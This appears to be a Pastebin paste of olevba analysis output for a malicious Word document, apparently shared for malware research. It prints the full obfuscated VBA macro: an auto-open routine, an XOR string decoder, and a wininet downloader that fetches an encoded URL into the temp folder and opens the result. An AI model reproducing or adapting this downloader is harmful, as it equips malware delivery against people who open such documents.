SHARE
TWEET

Malicious Word macro

dynamoo Mar 18th, 2015 274 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- nwncon~2.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: nwncon~2.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: nwncon~2.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. kdloosuu66
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Module4.bas
  27. in file: nwncon~2.doc - OLE stream: u'Macros/VBA/Module4'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. Private Sub RIV3333gO()
  30. GoTo wefwefwefweaafewf
  31. wefwefwefweaafewf:
  32. GoTo RERee33EGsssssgvfrgrg
  33. RERee33EGsssssgvfrgrg:
  34. GoTo EN299NEIKISKKKK7
  35. EN299NEIKISKKKK7:
  36. GoTo EN785NEIKISKKKK71
  37. EN785NEIKISKKKK71:
  38. GoTo ENNE435534IKISKKKK72
  39. ENNE435534IKISKKKK72:
  40. GoTo ULLL333LLAKhhwshefg
  41. ULLL333LLAKhhwshefg:
  42.  
  43. End Sub
  44. Public Function memak8of(acascasc22 As String, ghdhdhe8 As String) As String
  45.     Dim asasas1 As Long
  46.     Dim asasas1O As String
  47.     Dim asasas10 As Integer
  48.    
  49.     Dim efefe332d As Integer
  50. For efefe332d = 0 To 0
  51. If efefe332d = 25 Then End
  52. Next efefe332d
  53.    
  54.     Dim asasas101 As Integer
  55.  
  56.     For asasas1 = 1 To (Len(ghdhdhe8) / 2)
  57.         asasas10 = Val("&H" & (Mid$(ghdhdhe8, (2 * asasas1) - 1, 2)))
  58.         asasas101 = Asc(Mid$(acascasc22, ((asasas1 Mod Len(acascasc22)) + 1), 1))
  59.         Dim dwww343a As Integer
  60.         For dwww343a = 0 To 0
  61.         If dwww343a = 4 Then End
  62.         Next dwww343a
  63.         asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
  64.          Dim efe33q299 As Integer
  65.         For efe33q299 = 0 To 0
  66.         If efe33q299 = 4 Then End
  67.         Next efe33q299
  68.     Next asasas1
  69.    memak8of = asasas1O
  70. End Function
  71.  
  72. Private Sub IHYbeffeVuJC()
  73. GoTo asefawf3
  74. asefawf3:
  75. GoTo sgr467gfh
  76. sgr467gfh:
  77. GoTo d45854shfhfshf
  78. d45854shfhfshf:
  79. GoTo rhhrshrsth455
  80. rhhrshrsth455:
  81. GoTo uykoEuxdddd
  82. uykoEuxdddd:
  83. GoTo rVTBqKcccccArFPEEEEEyylmMVi
  84. rVTBqKcccccArFPEEEEEyylmMVi:
  85. GoTo IhzKeee2ascfacas2zw
  86. IhzKeee2ascfacas2zw:
  87. GoTo IhzKeee2svs2333zw
  88. IhzKeee2svs2333zw:
  89. GoTo IhzKeee223334css44zw
  90. IhzKeee223334css44zw:
  91.  
  92. End Sub
  93. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  94. ANALYSIS:
  95. +------------+-------------+-----------------------------------------+
  96. | Type       | Keyword     | Description                             |
  97. +------------+-------------+-----------------------------------------+
  98. | Suspicious | Chr         | May attempt to obfuscate specific       |
  99. |            |             | strings                                 |
  100. | Suspicious | Xor         | May attempt to obfuscate specific       |
  101. |            |             | strings                                 |
  102. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  103. |            |             | be used to obfuscate strings (option    |
  104. |            |             | --decode to see all)                    |
  105. +------------+-------------+-----------------------------------------+
  106. -------------------------------------------------------------------------------
  107. VBA MACRO Module11.bas
  108. in file: nwncon~2.doc - OLE stream: u'Macros/VBA/Module11'
  109. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  110. Private Sub RIVgO()
  111. GoTo myMuLxBcPMGZVtOntBESoqzJEi
  112. myMuLxBcPMGZVtOntBESoqzJEi:
  113. GoTo kDxnSccbgQJQvIHYbeuJCmUQrTZmwRfSEgCBd
  114. kDxnSccbgQJQvIHYbeuJCmUQrTZmwRfSEgCBd:
  115. GoTo NRsSeqnJfEwsDUkFsCaUyAhAG
  116. NRsSeqnJfEwsDUkFsCaUyAhAG:
  117. GoTo jstrwTahLZYosuLbSDlnHk
  118. jstrwTahLZYosuLbSDlnHk:
  119. GoTo zivUUwERtNsQiIuoGpMwG
  120. zivUUwERtNsQiIuoGpMwG:
  121. GoTo UlAHJSqlOQxDQfT
  122. UlAHJSqlOQxDQfT:
  123.  
  124. End Sub
  125. Private Sub vuykqyOpo()
  126. GoTo NrVTBqKAr
  127. NrVTBqKAr:
  128. GoTo yylmMViKeIhzKzwqIFMQdZlBwyHfL
  129. yylmMViKeIhzKzwqIFMQdZlBwyHfL:
  130. GoTo msLTIokkjoZRZD
  131. msLTIokkjoZRZD:
  132. GoTo gjmeCgKuqfzqguEnn
  133. gjmeCgKuqfzqguEnn:
  134. GoTo oKQlSkVaAolfxuRnL
  135. oKQlSkVaAolfxuRnL:
  136.  
  137. End Sub
  138. Public Function adrMOYidGVoIc()
  139. GoTo AzEpipThgwzCu
  140. AzEpipThgwzCu:
  141. GoTo bKtvPsx
  142. bKtvPsx:
  143. GoTo qDrdEbaBjAmqQqBvNLi
  144. qDrdEbaBjAmqQqBvNLi:
  145. GoTo UQctH
  146. UQctH:
  147. GoTo bytQYEZemcHQRPUsyF
  148. bytQYEZemcHQRPUsyF:
  149. GoTo wMPSKkyrcJLg
  150. wMPSKkyrcJLg:
  151. GoTo bYGTttUdqRmQpGhHS
  152. bYGTttUdqRmQpGhHS:
  153.  
  154. End Function
  155. Public Function Nk3Tflh()
  156. GoTo irOJnpV
  157. irOJnpV:
  158. GoTo DsYTTRQIOVn
  159. DsYTTRQIOVn:
  160. GoTo dSVNmPusaOjZPeoQQ
  161. dSVNmPusaOjZPeoQQ:
  162. GoTo luGiChFYjYUOheBl
  163. luGiChFYjYUOheBl:
  164. GoTo xJabwyHfLpFms
  165. xJabwyHfLpFms:
  166. GoTo IokkjoZRZDePgjmeCgK
  167. IokkjoZRZDePgjmeCgK:
  168. GoTo fzqguEnnaM
  169. fzqguEnnaM:
  170.  
  171. End Function
  172. Private Function QlSkVaAo85668lfxu()
  173.  
  174. End Function
  175. Public Function Nad121112rMOYidGVoI6c()
  176. GoTo AzEpipThgwzCuibKtvPsxKUqDrdEbaBj
  177. AzEpipThgwzCuibKtvPsxKUqDrdEbaBj:
  178. GoTo qQqBvNLi
  179. qQqBvNLi:
  180. GoTo UQctHQbytQY
  181. UQctHQbytQY:
  182. GoTo GTttUdqRmQpGhHSMfNkT
  183. GTttUdqRmQpGhHSMfNkT:
  184. GoTo hsJZgirO
  185. hsJZgirO:
  186.  
  187. End Function
  188. Public Function psvssqqqqqqY()
  189. GoTo PoePoePPP
  190. PoePoePPP:
  191. GoTo IokkjoKKLHHnaM
  192. IokkjoKKLHHnaM:
  193. GoTo QlSkVSsSMmnMxuRnLR
  194. QlSkVSsSMmnMxuRnLR:
  195. GoTo ssssscaaaa
  196. ssssscaaaa:
  197. GoTo GAAAAFFFFFc
  198. GAAAAFFFFFc:
  199. GoTo rA09181hgwzCuS
  200. rA09181hgwzCuS:
  201. GoTo KtvPs
  202. KtvPs:
  203.  
  204. End Function
  205. Private Function UqD34343434rdEbaBjAm()
  206.  
  207. End Function
  208. Private Function vNLigbrgrgRH8856H()
  209.  
  210. End Function
  211. Public Sub tQY34cHQ()
  212.  
  213. End Sub
  214. Public Function y5000S()
  215. GoTo cJLg6666sssssNbYGT
  216. cJLg6666sssssNbYGT:
  217. GoTo UdS334y5y5pGhHS
  218. UdS334y5y5pGhHS:
  219. GoTo NkTflaaAAa5555JZgirOJnpV
  220. NkTflaaAAa5555JZgirOJnpV:
  221.  
  222. End Function
  223. Public Function DsYTTRQIO()
  224.  
  225. End Function
  226. Public Function vssvsef3wtg3gxfvx()
  227. GoTo sdssssaas
  228. sdssssaas:
  229. GoTo sdvsS54738EG
  230. sdvsS54738EG:
  231. GoTo oZRZD44444eP
  232. oZRZD44444eP:
  233. GoTo meCvvvvvvgKuqf
  234. meCvvvvvvgKuqf:
  235.  
  236. End Function
  237.  
  238.  
  239.  
  240.  
  241.  
  242. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  243. ANALYSIS:
  244. +------------+-------------+-----------------------------------------+
  245. | Type       | Keyword     | Description                             |
  246. +------------+-------------+-----------------------------------------+
  247. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  248. |            |             | be used to obfuscate strings (option    |
  249. |            |             | --decode to see all)                    |
  250. +------------+-------------+-----------------------------------------+
  251. -------------------------------------------------------------------------------
  252. VBA MACRO Module3.bas
  253. in file: nwncon~2.doc - OLE stream: u'Macros/VBA/Module3'
  254. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  255. Option Explicit
  256.  
  257. #If VBA7 And Win64 Then
  258. Private Declare PtrSafe Function haggd867 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
  259. Private Declare PtrSafe Function majig892 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
  260. Private Declare PtrSafe Function ssdpOWW192 Lib "wininet.dll" Alias "InternetReadFile" (ByVal hFile As LongPtr, ByVal sBuff As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  261. Private Declare PtrSafe Function pqaLqqY64 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
  262. #Else
  263. Private Declare Function haggd867 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
  264. Private Declare Function majig892 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
  265. Private Declare Function ssdpOWW192 Lib "wininet.dll" Alias "InternetReadFile" (ByVal hFile As Long, ByVal sBuff As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  266. Private Declare Function pqaLqqY64 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
  267. #End If
  268.  
  269. Private Const MBL = 8162
  270. Private Const AAN As String = "Mod1"
  271. Private Const IOTD = 1
  272. Private Const IFNCW = &H4000000
  273. Public Function HolDMdWA88(ByVal sURL As String, ByVal sFileName As String) As Boolean
  274.     #If VBA7 And Win64 Then
  275.         Dim hOpen As LongPtr, hFile As LongPtr
  276.     #Else
  277.         Dim hOpen As Long, hFile As Long
  278.     #End If
  279.     Dim Ret As Long
  280.     Dim sBuff As String * MBL, sData As String
  281.     Dim iFile As Integer, dData As Double
  282.     hOpen = majig892(AAN, IOTD, vbNullString, vbNullString, 0)
  283.     If hOpen = 0 Then
  284.         Exit Function
  285.     End If
  286.     hFile = pqaLqqY64(hOpen, sURL, vbNullString, 0, IFNCW, 0)
  287.     If hFile = 0 Then
  288.         dData = 0
  289.     Else
  290.         ssdpOWW192 hFile, sBuff, MBL, Ret
  291.         sData = sBuff
  292.         Do While Ret <> 0
  293.             ssdpOWW192 hFile, sBuff, MBL, Ret
  294.             sData = sData + Mid(sBuff, 1, Ret)
  295.         Loop
  296.         dData = Len(sData): iFile = FreeFile
  297.         Open sFileName For Binary Access Write Lock Write As #iFile
  298.         Put #iFile, , sData: Close #iFile
  299.     End If
  300.     haggd867 hFile
  301.     haggd867 hOpen
  302.     sData = ""
  303.     If dData Then
  304.         HolDMdWA88 = True
  305.     End If
  306. End Function
  307. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  308. ANALYSIS:
  309. +------------+----------------+-----------------------------------------+
  310. | Type       | Keyword        | Description                             |
  311. +------------+----------------+-----------------------------------------+
  312. | Suspicious | Lib            | May run code from a DLL                 |
  313. | Suspicious | Open           | May open a file                         |
  314. | Suspicious | Write          | May write to a file (if combined with   |
  315. |            |                | Open)                                   |
  316. | Suspicious | Put            | May write to a file (if combined with   |
  317. |            |                | Open)                                   |
  318. | Suspicious | Binary         | May read or write a binary file (if     |
  319. |            |                | combined with Open)                     |
  320. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  321. |            |                | may be used to obfuscate strings        |
  322. |            |                | (option --decode to see all)            |
  323. | IOC        | wininet.dll    | Executable file name                    |
  324. +------------+----------------+-----------------------------------------+
  325. -------------------------------------------------------------------------------
  326. VBA MACRO UserForm1.frm
  327. in file: nwncon~2.doc - OLE stream: u'Macros/VBA/UserForm1'
  328. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  329. (empty macro)
  330. -------------------------------------------------------------------------------
  331. VBA MACRO Class1.cls
  332. in file: nwncon~2.doc - OLE stream: u'Macros/VBA/Class1'
  333. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  334. (empty macro)
  335. -------------------------------------------------------------------------------
  336. VBA MACRO Module1.bas
  337. in file: nwncon~2.doc - OLE stream: u'Macros/VBA/Module1'
  338. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  339. (empty macro)
  340. -------------------------------------------------------------------------------
  341. VBA MACRO Module2.bas
  342. in file: nwncon~2.doc - OLE stream: u'Macros/VBA/Module2'
  343. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  344. Private Const GRxvSG = "39060F080F440B3A1B010A020A190D0500"
  345. Private Const jryj = "363E030F020E26255D594D041308"
  346. Private Const sdioph34 = "021A1E145945652E0E021008020F110E0B440006452E2F041E0A080918000F400E014C00396509040D4F0E1501"
  347. Private Const Mcdsef42 = "390D180D131E23240C432508070837131D1E010E2528200E0E17"
  348. Private Const vjf788eS = "djnjdcjJJkmcakm"
  349.  
  350.  
  351.  
  352.  
  353.  
  354.  
  355. Sub kdloosuu66()
  356. Dim FSOOO2
  357. Dim sder53dfbhRF As Integer
  358. For sder53dfbhRF = 0 To 0
  359. If sder53dfbhRF = 5 Then End
  360. Next sder53dfbhRF
  361. Set FSOOO2 = CreateObject(memak8of(vjf788eS, Mcdsef42))
  362. Dim fffffF
  363. Const fffffFID = 2
  364. Dim DdDd22A As Integer
  365. For DdDd22A = 0 To 0
  366. If DdDd22A = 5 Then End
  367. Next DdDd22A
  368. Set fffffF = FSOOO2.GetSpecialFolder(fffffFID)
  369. Dim Ee11 As Integer
  370. For Ee11 = 0 To 0
  371. If Ee11 = 5 Then End
  372. Next Ee11
  373. EdEdE111 = fffffF & memak8of(vjf788eS, jryj)
  374. Dim sil3489df As Integer
  375. For sil3489df = 0 To 0
  376. If sil3489df = 5 Then End
  377. Next sil3489df
  378. Set FSObject2 = CreateObject(memak8of(vjf788eS, Mcdsef42))
  379. Dim seswwwsa As Integer
  380. For seswwwsa = 0 To 0
  381. If seswwwsa = 5 Then End
  382. Next seswwwsa
  383. If FSObject2.FileExists(EdEdE111) Then
  384. FSObject2.DeleteFile EdEdE111
  385. End If
  386. If HolDMdWA88(memak8of(vjf788eS, sdioph34), EdEdE111) Then
  387. End If
  388. Set SSSS = Nothing
  389. If FSObject2.FileExists(EdEdE111) Then
  390. End If
  391. Set SASASA = CreateObject(memak8of(vjf788eS, GRxvSG))
  392. SASASA.Open EdEdE111
  393. End Sub
  394.  
  395.  
  396.  
  397.  
  398. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  399. ANALYSIS:
  400. +------------+--------------+-----------------------------------------+
  401. | Type       | Keyword      | Description                             |
  402. +------------+--------------+-----------------------------------------+
  403. | Suspicious | CreateObject | May create an OLE object                |
  404. | Suspicious | Open         | May open a file                         |
  405. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
  406. |            |              | be used to obfuscate strings (option    |
  407. |            |              | --decode to see all)                    |
  408. +------------+--------------+-----------------------------------------+
  409. -------------------------------------------------------------------------------
  410. VBA MACRO Module5.bas
  411. in file: nwncon~2.doc - OLE stream: u'Macros/VBA/Module5'
  412. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  413.  
  414. Public Sub PkD4040Sccbg()
  415.  
  416. End Sub
  417. Private Sub IHYbe505VuJC()
  418. GoTo TZmwR230fSEgCdKcNRsSeYqnJf
  419. TZmwR230fSEgCdKcNRsSeYqnJf:
  420. GoTo sDUk444FsCaUyA
  421. sDUk444FsCaUyA:
  422. GoTo GODjstrwT6904lnHkpCzivUUw
  423. GODjstrwT6904lnHkpCzivUUw:
  424. GoTo tNsQiIjuoGp873Tz
  425. tNsQiIjuoGp873Tz:
  426. GoTo uykqyO888855poEux
  427. uykqyO888855poEux:
  428. GoTo rVTBqKAr357FPyylmMVi
  429. rVTBqKAr357FPyylmMVi:
  430. GoTo IhzK4444zw
  431. IhzK4444zw:
  432. GoTo FdMQdZlB0258CYajGoQNTnvkPL
  433. FdMQdZlB0258CYajGoQNTnvkPL:
  434. GoTo PAtAfFrPpPpHKNFeHmVR
  435. PAtAfFrPpPpHKNFeHmVR:
  436.  
  437. End Sub
  438. Private Sub RIV1541414gO()
  439. GoTo myMuLsaaaESoqzJEi
  440. myMuLsaaaESoqzJEi:
  441. GoTo kDxnScceeeeeCmUQrTZmwRfSEgCBd
  442. kDxnScceeeeeCmUQrTZmwRfSEgCBd:
  443. GoTo NRsSeqnaaaaaJfEwsDUkFsCaUyAhAG
  444. NRsSeqnaaaaaJfEwsDUkFsCaUyAhAG:
  445. GoTo jstrwT2352525ahLZYosuLbSDlnHk
  446. jstrwT2352525ahLZYosuLbSDlnHk:
  447. GoTo zivUUw44oGpMwG
  448. zivUUw44oGpMwG:
  449. GoTo UlAHJS444444qlOQxDQfT
  450. UlAHJS444444qlOQxDQfT:
  451.  
  452. End Sub
  453. Private Sub vuyk111111qyOpo()
  454. GoTo NrV1010TBqKAr
  455. NrV1010TBqKAr:
  456. GoTo yylmMVi6464KeIhzKzwqIFMQdZlBwyHfL
  457. yylmMVi6464KeIhzKzwqIFMQdZlBwyHfL:
  458. GoTo msLTIok444kjoZRZD
  459. msLTIok444kjoZRZD:
  460. GoTo gjmeCgKu555qfzqguEnn
  461. gjmeCgKu555qfzqguEnn:
  462. GoTo oKQlSkVaA768olfxuRnL
  463. oKQlSkVaA768olfxuRnL:
  464.  
  465. End Sub
  466. Public Function adrMOY7777idGVoIc()
  467. GoTo AzEpipThgwsdve4zCu
  468. AzEpipThgwsdve4zCu:
  469. GoTo bKtv4444Psx
  470. bKtv4444Psx:
  471. GoTo qDrdEbaBj534745674AmqQqBvNLi
  472. qDrdEbaBj534745674AmqQqBvNLi:
  473. GoTo UQct874H
  474. UQct874H:
  475. GoTo bytQYE0990099ZemcHQRPUsyF
  476. bytQYE0990099ZemcHQRPUsyF:
  477. GoTo wMPSKk333yrcJLg
  478. wMPSKk333yrcJLg:
  479. GoTo bYG23232TttUdqRmQpGhHS
  480. bYG23232TttUdqRmQpGhHS:
  481.  
  482. End Function
  483. Public Function Nk3121212Tflh()
  484. GoTo irO5789JnpV
  485. irO5789JnpV:
  486. GoTo DsYTTR3333QIOVn
  487. DsYTTR3333QIOVn:
  488. GoTo dSVNmPusa565656OjZPeoQQ
  489. dSVNmPusa565656OjZPeoQQ:
  490. GoTo luGiChFYjYUO99999heBl
  491. luGiChFYjYUO99999heBl:
  492. GoTo xJabwyHfLpF66666ms
  493. xJabwyHfLpF66666ms:
  494. GoTo Io44kkjoZRZDePgj54meCgK
  495. Io44kkjoZRZDePgj54meCgK:
  496. GoTo fz343333222MMMaM
  497. fz343333222MMMaM:
  498.  
  499. End Function
  500. Private Function QlSkGhHHGgglfxu()
  501.  
  502. End Function
  503. Public Function psvssEEEqqqqqqY()
  504. GoTo PoeP001199PPP
  505. PoeP001199PPP:
  506. GoTo OPDK333339ja
  507. OPDK333339ja:
  508. GoTo JabwyU444444IOTYhFms
  509. JabwyU444444IOTYhFms:
  510. GoTo IokkjoKKLHH55555naM
  511. IokkjoKKLHH55555naM:
  512. GoTo QlSkVSsSM66666mnMxuRnLR
  513. QlSkVSsSM66666mnMxuRnLR:
  514. GoTo s77777sssscaaaa
  515. s77777sssscaaaa:
  516. GoTo GAAAAFFFFFc
  517. GAAAAFFFFFc:
  518. GoTo rA09181hg88888wzCuS
  519. rA09181hg88888wzCuS:
  520. GoTo KtvP999999s
  521. KtvP999999s:
  522.  
  523. End Function
  524. Private Function UqD34343000000dEbaBjAm()
  525.  
  526. End Function
  527. Private Function vNLigbrg1010108856H()
  528.  
  529. End Function
  530. Public Sub tQY34212121cHQ()
  531.  
  532. End Sub
  533. Public Function y5012121200S()
  534. GoTo cJLg666wewEEENbYGT
  535. cJLg666wewEEENbYGT:
  536. GoTo UdSWRRrrRRTT5y5pGhHS
  537. UdSWRRrrRRTT5y5pGhHS:
  538. GoTo NkTflaaAAaYyYyYyJnpV
  539. NkTflaaAAaYyYyYyJnpV:
  540.  
  541. End Function
  542. Public Function DsYT3332222TRQIO()
  543.  
  544. End Function
  545. Public Function vssvs234567gxfvx()
  546. GoTo sdsssNnNnsaas
  547. sdsssNnNnsaas:
  548. GoTo sdvsS5KkKk4738EG
  549. sdvsS5KkKk4738EG:
  550. GoTo oZRZD44UuUuUu444eP
  551. oZRZD44UuUuUu444eP:
  552. GoTo meCvvvvvvgKuqf
  553. meCvvvvvvgKuqf:
  554.  
  555. End Function
  556.  
  557. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  558. ANALYSIS:
  559. +------------+-------------+-----------------------------------------+
  560. | Type       | Keyword     | Description                             |
  561. +------------+-------------+-----------------------------------------+
  562. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  563. |            |             | be used to obfuscate strings (option    |
  564. |            |             | --decode to see all)                    |
  565. +------------+-------------+-----------------------------------------+
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top